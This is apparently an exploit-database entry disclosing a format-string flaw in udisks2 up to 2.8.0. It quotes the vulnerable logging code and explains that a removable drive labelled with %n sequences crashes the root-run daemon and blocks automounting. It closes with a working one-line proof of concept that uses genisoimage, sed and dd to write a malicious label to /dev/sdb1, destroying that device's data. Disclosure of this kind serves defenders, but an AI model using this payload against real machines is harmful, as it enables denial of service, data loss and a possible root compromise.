udisks2 2.8.0 - Denial of Service (PoC)









# Exploit: udisks2 2.8.0 - Denial of Service (PoC)
# Author: oxagast
# Date: 2018-09-22
# Vendor Homepage: http://storaged.org/
# Software Link: https://github.com/storaged-project/udisks
# Version: <=udisks2 2.8.0
# Tested on: Ubuntu x64
    __ _  _  __   ___  __  ____ ____ 
  /  ( \/ )/ _\ / __)/ _\/ ___(_  _)
 (  O )  (/    ( (_ /    \___ \ )(  

# ========The vulnerable section of code is:========
#if GLIB_CHECK_VERSION(2, 50, 0)
  g_log_structured ("udisks", (GLogLevelFlags) level,
        "MESSAGE", message, "THREAD_ID", "%d", (gint) syscall (SYS_gettid),
        "CODE_FUNC", function, "CODE_FILE", location);
  g_log ("udisks", level, "[%d]: %s [%s, %s()]", (gint) syscall (SYS_gettid), message, location, function);

# =================Short Whitepaper=================
# The vulnerability can be triggered by using one computer to create a filesystem on a USB key 
# (or other removable media), then editing it's filesystem label to include a bunch of %n's, removing and 
# inserting the media into another computer running udisks2 <=2.8.0.  This binary runs as root, and if 
# exploited in that capacity could potentially allow full compromise.  This will cause a denial of service, 
# crashing udisks2 and not letting it restart (or until /var/lib/udisks2/mounted-fs is 
# removed and the system is restarted).  This keeps the system from automounting things like USB drives and CDs.
# The vulnerability -may- be exploitable beyond a DoS by crafting a format string exploit and putting it
# in the label of the drive.  I tried to exploit it for a couple days, but cannot find a filesystem with a
# lengthy enough label to be able to fit the exploit and spawn a root shell, as the smallest shellcode I
# could make was around 50 characters, and the longest filesystem labels I could find are limited to 32 characters.

# =============Proof of Concept Code================
# This code will destroy any information on /dev/sdb1!!!!  Change that to where you have your USB media.
# PoC source code:

genisoimage -V "AAAAAAAA" -o dos.iso /etc/passwd && dd if=dos.iso | sed -e 's/AAAAAAAA/%n%n%n%n/g' | dd of=/dev/sdb1

# Now remove and reinsert the media and wait for the crash report.